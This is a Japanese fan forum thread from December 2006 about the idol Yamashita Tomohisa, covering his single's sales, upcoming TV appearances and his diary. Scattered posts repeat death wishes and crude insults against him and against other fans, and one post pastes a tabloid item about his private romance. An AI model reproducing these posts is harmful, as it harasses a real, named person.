457 :ユー&名無しネ:2006/12/28(木) 19:22:41 ID:SGypXVK9
やまぴーを語れ(避難所)
http://jbbs.livedoor.jp/music/7762/yamap.html

雑談【6】
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1159457228/

提案3
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1157093814/

458 :ユー&名無しネ:2006/12/28(木) 19:34:24 ID:j5bmRMfi
FF60万枚行ったんだね!Pオメ!来年もガンガレ

459 :ユー&名無しネ:2006/12/28(木) 19:43:59 ID:Mgqnbexs
セニョ60万超オメ!
阪急梅田のP祭りいつまでやってるのかな
あれこそポスター欲しい(w

460 :ユー&名無しネ:2006/12/28(木) 19:52:17 ID:j5bmRMfi
>458
間違えたセニョだった

461 :ユー&名無しネ:2006/12/28(木) 20:04:44 ID:XWoDBDUE
>>446
白虎隊地元なんだが普通にクリーニング屋とかに貼ってあるw

462 :ユー&名無しネ:2006/12/28(木) 20:06:15 ID:JPq4+UFX
>459
うんホスイあのポスター結構デカイよね
いつまで広告期間なのかな?駅員に頼めばイイの?

463 :ユー&名無しネ:2006/12/28(木) 20:22:15 ID:9qlF9Xtz
60万枚突破おめ!
600,001ってなんだか笑えるね

464 :ユー&名無しネ:2006/12/28(木) 20:30:28 ID:ZFDCN5rh
ポスターは著作権等の問題で一般的には処分
捨てるぐらいならクレって思うけどそうはいかないらしい
貰える姐さんは本当にラッキーなんだよ

465 :ユー&名無しネ:2006/12/28(木) 20:54:37 ID:SGypXVK9

 視
  age

466 :ユー&名無しネ:2006/12/28(木) 21:17:44 ID:JPq4+UFX
>464
そっか〜ダメモトでも聞いてみようカナ

467 :ユー&名無しネ:2006/12/28(木) 21:21:10 ID:Ufe3jrHU
白虎隊HP更新で番宣情報載ってる
>9に付け足しで
1月1日
5:55〜7:30 ニュース番組(新年挨拶コメ)

468 :ユー&名無しネ:2006/12/28(木) 21:30:20 ID:LNNWe0MZ
新年早々早起きか
白虎隊士姿が多いな

469 :ユー&名無しネ:2006/12/28(木) 21:30:54 ID:JPq4+UFX
>467
d!うわぁ年始楽しみスギ

470 :ユー&名無しネ:2006/12/28(木) 21:37:37 ID:Vq+HQoDH
能無し大根山下はさっさと死ね


471 :ユー&名無しネ:2006/12/28(木) 21:44:05 ID:SGypXVK9
そうだ氏ね氏ね

472 :ユー&名無しネ:2006/12/28(木) 23:16:08 ID:vgLQBxzL
>461
d地元ウラヤマシス
亀だがアンカーは>でヨロ
>456
1/9迄

473 :ユー&名無しネ:2006/12/28(木) 23:53:49 ID:Vq+HQoDH
能無し大根山下はさっさと死ね


474 :ユー&名無しネ:2006/12/29(金) 00:01:52 ID:SGypXVK9
そうだ氏ね氏ね

475 :ユー&名無しネ:2006/12/29(金) 00:02:26 ID:E1Bs4v62
1/7新堂本兄弟で2006年未公開総集編やるね
GYM出るカモなので一応
既出だったらスマソ

476 :ユー&名無しネ:2006/12/29(金) 00:07:38 ID:j5bmRMfi
P毎日更新ありがd
それだけで嬉しいよ

477 :ユー&名無しネ:2006/12/29(金) 00:07:59 ID:Lq8DRK5R
西のこと電車で考えるPセツナス
レベルが上がってるとは勿論石鹸のことだよな?
紺待ってます

478 :ユー&名無しネ:2006/12/29(金) 00:10:28 ID:80vVuhpX
Pちゃん偉いな
電車乗ってる時なんか寝てるかぼーっとするかどっちかだよ自分

479 :ユー&名無しネ:2006/12/29(金) 00:10:54 ID:52M6HtNt
西&メンバーの話キタコレ
人情と男気に溢れるPは決して軟派ではないよね(w


480 :ユー&名無しネ:2006/12/29(金) 00:11:05 ID:4cAntFMz
自分も電車載ってる時はいろいろ考えるな
西も升も元気だべ

481 :ユー&名無しネ:2006/12/29(金) 00:13:45 ID:1fvnEYM8
自分は毎日プラス思考だからPと気が合うな

482 :ユー&名無しネ:2006/12/29(金) 00:15:17 ID:L1zZy9DZ
やることないから考え事するよね
来年いろいろどうなんのか気になるな

483 :ユー&名無しネ:2006/12/29(金) 00:15:24 ID:uWI/0bXm
あびる優がゲットした大物アイドル (ゲンダイネット)

あびる優(20)が「やった!」と叫んだかどうかは知らないが、
彼女が人気グループ「NEWS]の山下智久(21)をゲットしたことで話題騒然だ。

あびるに以前の笑顔が戻ったのはごく最近のことだ。
昨冬の窃盗告白騒動で一気に出番がなくなり、タレント生命が危ぶまれたほどだった。
そんな状況が一変したのは9月に放送されたテレビ朝日の番組企画「100キロマラソン」がキッカケだった。
あびるは今月掲載された本紙の連載コラム「リセット完了!」でも「一から出直すつもりでいる」と語った。

そのあびるが交際している山下は、先ごろ活動休止会見を開いた
「KAT―TUN」の赤西仁や亀梨和也以上に将来を期待されている人気アイドルだ。

発売中の「週刊文春」によれば、
2人は9月上旬に縁結びで有名な京都の地主神社を参拝しているところを見られ、
10月上旬には那覇市内の薄暗いバーなどでも目撃されたという。

「あびるといえば、ISSAやロンブーの淳との交際が有名です。
今回の山下は“山P”といわれて歌もドラマもヒットさせているビッグなアイドルで、
これまでの相手と比べものにならないくらいインパクトが強烈。
彼はジャニー喜多川氏のお気に入りで、熱狂的なファンが多いだけに、周囲の反発が怖いですね」(芸能関係者)

あびるは転んでもタダでは起きなかった。


484 :ユー&名無しネ:2006/12/29(金) 00:17:13 ID:/UmJeXe7
西の名前ひさびさでなんか違和感があるな
つーか℃の連載については一切ふれないのか(w
笛もカメラ買うとか言ってるな
偶然か

485 :ユー&名無しネ:2006/12/29(金) 00:21:58 ID:7/7nxtlM
名前出すこと自体めずらしいな。すごくうれしい

486 :ユー&名無しネ:2006/12/29(金) 00:22:09 ID:uWI/0bXm
さすが 寄 生 虫
去る者もしつこく追いかけ回すんだろうな

487 :ユー&名無しネ:2006/12/29(金) 00:26:06 ID:7/7nxtlM
sage忘れ

488 :ユー&名無しネ:2006/12/29(金) 00:31:24 ID:eFf69O+k
さすがPイイ事言うなぁとオモたら親子丼って(w
早く紺行きてぇ!

489 :ユー&名無しネ:2006/12/29(金) 00:33:55 ID:gg7HJJip
なんでここで西の名前を出すんだ?
辞めた奴なんかもう関係ないだろ
Pスレに西担が寄生してるのか?ウザ

490 :ユー&名無しネ:2006/12/29(金) 00:35:41 ID:nMNIdKEa
今日リアルに親子丼食べたからウレシスw

親友じゃなくて直接名前が出たのヒサビサじゃね?

491 :ユー&名無しネ:2006/12/29(金) 00:36:07 ID:UDC9QXEb
そういや電車乗ってるPの写メあったの思い出した
座ってるPは珍しかったな

492 :ユー&名無しネ:2006/12/29(金) 00:41:26 ID:4cAntFMz
>490
久々だな
つ(

493 :ユー&名無しネ:2006/12/29(金) 00:42:55 ID:uWI/0bXm
やまぴーを語れ(避難所)
http://jbbs.livedoor.jp/music/7762/yamap.html

雑談【6】
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1159457228/

提案3
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1157093814/

494 :ユー&名無しネ:2006/12/29(金) 00:48:02 ID:0BUkE1kb
石鹸levelup禿楽しみ
歌はあんまりlevelupしてないのタモステで確認済みだから気持ちのlevelupかな(w

495 :ユー&名無しネ:2006/12/29(金) 00:52:22 ID:52M6HtNt
>484
℃連載を見事にスルーするPにモエ(w
そういや以前もカメラ買って放置してたような

496 :ユー&名無しネ:2006/12/29(金) 00:52:42 ID:uBTa0fZV
自分も西の名前出しててビビンバ
久々でホコーリ
何だかんだで活動停止からあっという間だたな

497 :ユー&名無しネ:2006/12/29(金) 01:00:06 ID:1fvnEYM8
今日M誌と歩誌買ってきた今から読むノシ

498 :ユー&名無しネ:2006/12/29(金) 01:04:41 ID:UDC9QXEb
Pがカメラ買うとしてもパンフだけ持ち帰って一晩悩むなんてしないな(w

499 :ユー&名無しネ:2006/12/29(金) 01:12:43 ID:eFf69O+k
元旦朝の番宣って生かな?


500 :ユー&名無しネ:2006/12/29(金) 01:14:47 ID:wS9pVtYR
Pが普通に電車乗ってたら驚くよ(w大丈夫なのか?
LevelUpと言うP
ガンガレ

501 :ユー&名無しネ:2006/12/29(金) 01:33:49 ID:1fvnEYM8
Pと笛のロードをCD化して欲しいな

502 :ユー&名無しネ:2006/12/29(金) 01:37:00 ID:4cAntFMz
>499
隊士姿なんだからVTRでは
撮影中に撮っちゃったんだろ

503 :ユー&名無しネ:2006/12/29(金) 01:55:28 ID:a4zywOR5
早くライブで会いたい〜

504 :ユー&名無しネ:2006/12/29(金) 02:15:14 ID:d0EIMCpl
確かに℃の連載無視しててワロタ(w
けど思わぬところで西の名前出てて単純に嬉しくなった
それから他担だが早くlevelupした石鹸をいっそう見たくなった
早く年よ明けろ!

505 :ユー&名無しネ:2006/12/29(金) 02:40:15 ID:tTNSLb9d
能無し大根山下はさっさと死ね


506 :ユー&名無しネ:2006/12/29(金) 02:47:09 ID:VpkXuvOD
>483
飽きた

507 :ユー&名無しネ:2006/12/29(金) 03:00:42 ID:XWlxM61M
>475
d!ミシュツだとオモー
7日白虎隊放送終了のすぐ後だな
>504
他担姐さんd
℃っくん連載は気付いてないと思われ(w

508 :ユー&名無しネ:2006/12/29(金) 03:08:15 ID:XWlxM61M
今日の日記感動したノシ
俺は1になっての下りとか特に、P前向いてガンガレ
連投スマソ

509 :ユー&名無しネ:2006/12/29(金) 03:31:26 ID:BI9KanLJ
ヤフーアワード2006MUSICの邦楽ベストシングル部門に
セニョがエントリーしてるので投票ヨロ!

ttp://yahoo-award.yahoo.co.jp/music/13.html


510 :ユー&名無しネ:2006/12/29(金) 04:38:54 ID:mLqy4Mqf
さっき音楽番組チャートでセニョ4位で網五3位だた

511 :ユー&名無しネ:2006/12/29(金) 04:59:10 ID:DQ1ENCzP
能無し大根音痴山下はさっさと死ね


512 :ユー&名無しネ:2006/12/29(金) 07:14:09 ID:/mFURZQI
今年度ドラマ満足度でクロサギ10位だったよ
あとめんたいの姐さん方8日からクロサギ再放送なのはガイシュツ?

513 :ユー&名無しネ:2006/12/29(金) 07:45:03 ID:kyrkwN5U
31(日) 10:50-11:45「大公開!マグロ&白虎隊」
    18:00-20:00「ドラえもん大晦日生放送スペシャル」(VTR出演)
    23:45-24:45「ジャニーズカウントダウン2006-2007」
*1(月) 05:55-07:30「新春初日の出生中継&ニュース」
*2(火) 21:00-23:30「超ぷっスマ!」
*5(金) 白虎隊イベント
*6(土) 10:55-11:45「いよいよ白虎隊」
    15:30-16:45「ぷれミーヤ!」
    18:30-21:00「細木数子vs日本の歴史 これがホントの話よ」
    21:00-23:25『白虎隊』第一夜
*7(日) 15:30-16:00「白虎隊裏話」
    21:00-23:25『白虎隊』第二夜

発売中の掲載雑誌
TVジャパン、TVガイド、TVnavi、TVステーション、テレパルf(表紙)、TVanan、
MAQUIA、ピチレモン、ニコラ、時代劇マガジン

514 :ユー&名無しネ:2006/12/29(金) 08:02:34 ID:uyVKayzr
細木のは今日のじゃないんだね
会社行くのに録画と思ったけどなんか違うとおもって

515 :ユー&名無しネ:2006/12/29(金) 08:09:32 ID:uWI/0bXm
トーストにPのうんこ塗って食いたい

516 :ユー&名無しネ:2006/12/29(金) 08:16:29 ID:ATvSFrmX
>513
d

517 :ユー&名無しネ:2006/12/29(金) 08:39:18 ID:bTumfR1G
29日朝日新聞クロサギ伊興田Pの※
Pの「バーン」アドリブの話などあり

518 :ユー&名無しネ:2006/12/29(金) 10:40:08 ID:HfhyPvdZ
>472
亀だがdですた
遠征がてら行ってくるよノシ

519 :ユー&名無しネ:2006/12/29(金) 10:46:40 ID:8i2h8t03
白虎隊の撮影スタッフのクルーブログの最後のところにTさんから書き込みある!
返事かいてるスタッフさんが山下君かな?田中くんかな?ってあるけど
なんとなく書き方からPっぽい

520 :ユー&名無しネ:2006/12/29(金) 10:55:09 ID:8i2h8t03
519ですがスマン
返事書いてるのはスタッフさんではなかった
とにかく京都では皆から智久って呼ばれてたからPかな?

521 :ユー&名無しネ:2006/12/29(金) 11:10:23 ID:4ot3IJkv
>520
違うだろ
オマイ厨臭いよ

522 :ユー&名無しネ:2006/12/29(金) 11:22:57 ID:TrGR1AM5
>520
白虎隊スレにも書き込んでる?
イロイロ痛いから半年ロムってくれまいか

523 :ユー&名無しネ:2006/12/29(金) 12:43:18 ID:0BUkE1kb
>517
dだがPのバーンではなく山崎サンのアドリブバーンだな

524 :ユー&名無しネ:2006/12/29(金) 12:43:31 ID:HKH//nbd
他スレ不感症

525 :ユー&名無しネ:2006/12/29(金) 12:48:41 ID:2o5PNHkX
個人がどのスレ見に行ってるかなんて報告イラネ

526 :ユー&名無しネ:2006/12/29(金) 12:50:32 ID:8zrhVqeB
>513
d
白虎隊いよいよだな
wktk杉だよ



527 :ユー&名無しネ:2006/12/29(金) 13:41:51 ID:80vVuhpX
書き方からしてオムPではないよな

528 :ユー&名無しネ:2006/12/29(金) 14:41:49 ID:27D2oUkp
テレ朝HPのトップまぐろから白虎隊に変わって
Pのアプになったね


529 :ユー&名無しネ:2006/12/29(金) 15:18:28 ID:uWI/0bXm

 膿
  万
   歳

530 :ユー&名無しネ:2006/12/29(金) 15:49:44 ID:cDBjCCsJ
>528
d見てきた
チト怖くないデスカ(w
コロコロ代わるっぽいマグロと

531 :ユー&名無しネ:2006/12/29(金) 20:11:32 ID:80vVuhpX
イブの滝つ紺で滝パパにミニスカサンタ所望されてたのかPちゃん(w

532 :ユー&名無しネ:2006/12/29(金) 20:23:07 ID:iv+yIbv8
わかったから氏ねよキモヲタ

533 :ユー&名無しネ:2006/12/29(金) 20:56:00 ID:4cAntFMz
カラオケ番組でアミーゴ1位だったよ
そのあと峰治自刃シーンのCMきた

534 :ユー&名無しネ:2006/12/29(金) 21:53:07 ID:wS9pVtYR
>531
kwsk

535 :ユー&名無しネ:2006/12/29(金) 22:00:04 ID:iv+yIbv8
やまぴーを語れ(避難所)
http://jbbs.livedoor.jp/music/7762/yamap.html

雑談【6】
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1159457228/

提案3
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1157093814/

536 :ユー&名無しネ:2006/12/29(金) 22:53:01 ID:x5x2tBFQ
少クラ出るんだね

537 :ユー&名無しネ:2006/12/29(金) 22:56:45 ID:oveL1BX6
斜視age

538 :ユー&名無しネ:2006/12/29(金) 23:03:17 ID:DCPwW/hB
少蔵キタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・* !!!!
来年もいい年になりそうだな

539 :ユー&名無しネ:2006/12/29(金) 23:34:03 ID:GVnRDdr2
今日の細木さんの番組で6日の番組のCMが流れてた
細木さんがPのこと山Pって呼んでた
細木さん新たな恋の予感とかナレが流れててバロスだった(w

>536
情報dです

540 :ユー&名無しネ:2006/12/29(金) 23:34:13 ID:yf/kR849
細木番組の予告CM見た
すごい惚れっぷりだな
「山Pは違うの」って何が違うんだ?

541 :ユー&名無しネ:2006/12/29(金) 23:39:18 ID:TrGR1AM5
今日は白虎隊CM数種カラオケでアミーゴプッスマCM細木CMと
いろんなPが映ってたウマーな一日だったよ@たこやき

542 :ユー&名無しネ:2006/12/29(金) 23:43:54 ID:lahPUFCe
遅くなったが
少蔵キタ━━━━━━(゚∀゚)━━━━━━ !!

543 :ユー&名無しネ:2006/12/29(金) 23:48:43 ID:iv+yIbv8
キング山下

544 :ユー&名無しネ:2006/12/29(金) 23:53:36 ID:FyLclc+L
少蔵ってズニア番組の?

545 :ユー&名無しネ:2006/12/30(土) 00:07:14 ID:KrX6rQ1D
少蔵情報d
来年いい年になるといいな
今日の日記もホコーリ

546 :ユー&名無しネ:2006/12/30(土) 00:12:01 ID:gcKu5xJY
Pにとって「てかなる」は口癖(w
でも、こう前向きに思う事によってホントになるからね

547 :ユー&名無しネ:2006/12/30(土) 00:14:45 ID:6iGOpYLT
応援してるよ
てか何歌うんだろ

548 :ユー&名無しネ:2006/12/30(土) 00:14:53 ID:hY47OeVo
>546
てかなるって好き
帝都も寒いのか
飲みすぎ&風邪には気をつけろP

549 :ユー&名無しネ:2006/12/30(土) 00:17:55 ID:1EDLnUoG
Pチャンにとっても来年が今年よりもっといい年になりますように
てかなるねきっと!

550 :ユー&名無しネ:2006/12/30(土) 00:19:32 ID:1EDLnUoG
>540
「滝はかっこいいでPは可愛い」ってやつじゃない?

551 :ユー&名無しネ:2006/12/30(土) 00:20:27 ID:1EDLnUoG
あこれはTBSのズバリだっけか失礼

552 :ユー&名無しネ:2006/12/30(土) 00:24:55 ID:3537XdUY
なにこのキモヲタ

553 :ユー&名無しネ:2006/12/30(土) 00:24:56 ID:gcKu5xJY
P来年の春に逢おうね!復活紺楽しみにしてるよいつも自分以外の人の幸せを考えてるPが好き

554 :ユー&名無しネ:2006/12/30(土) 00:27:28 ID:LEm/JqMw
今日の日記でも笑顔になれたよ
Pありがd!

555 :ユー&名無しネ:2006/12/30(土) 00:28:02 ID:vXSSPdbj
今日は何の忘年会だろうね
白虎隊はお金かかってるからスポンサーの接待大変だろうな

556 :ユー&名無しネ:2006/12/30(土) 00:32:05 ID:3537XdUY
やまぴーを語れ(避難所)
http://jbbs.livedoor.jp/music/7762/yamap.html

雑談【6】
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1159457228/

提案3
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1157093814/

557 :ユー&名無しネ:2006/12/30(土) 01:17:34 ID:JDX54zgC
少蔵タノシミ
何歌うんだろ

558 :ユー&名無しネ:2006/12/30(土) 03:52:02 ID:PRFDDPt6
ってかなるてメチャメチャくらいよく出てくるな(wカワエエけど

94 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)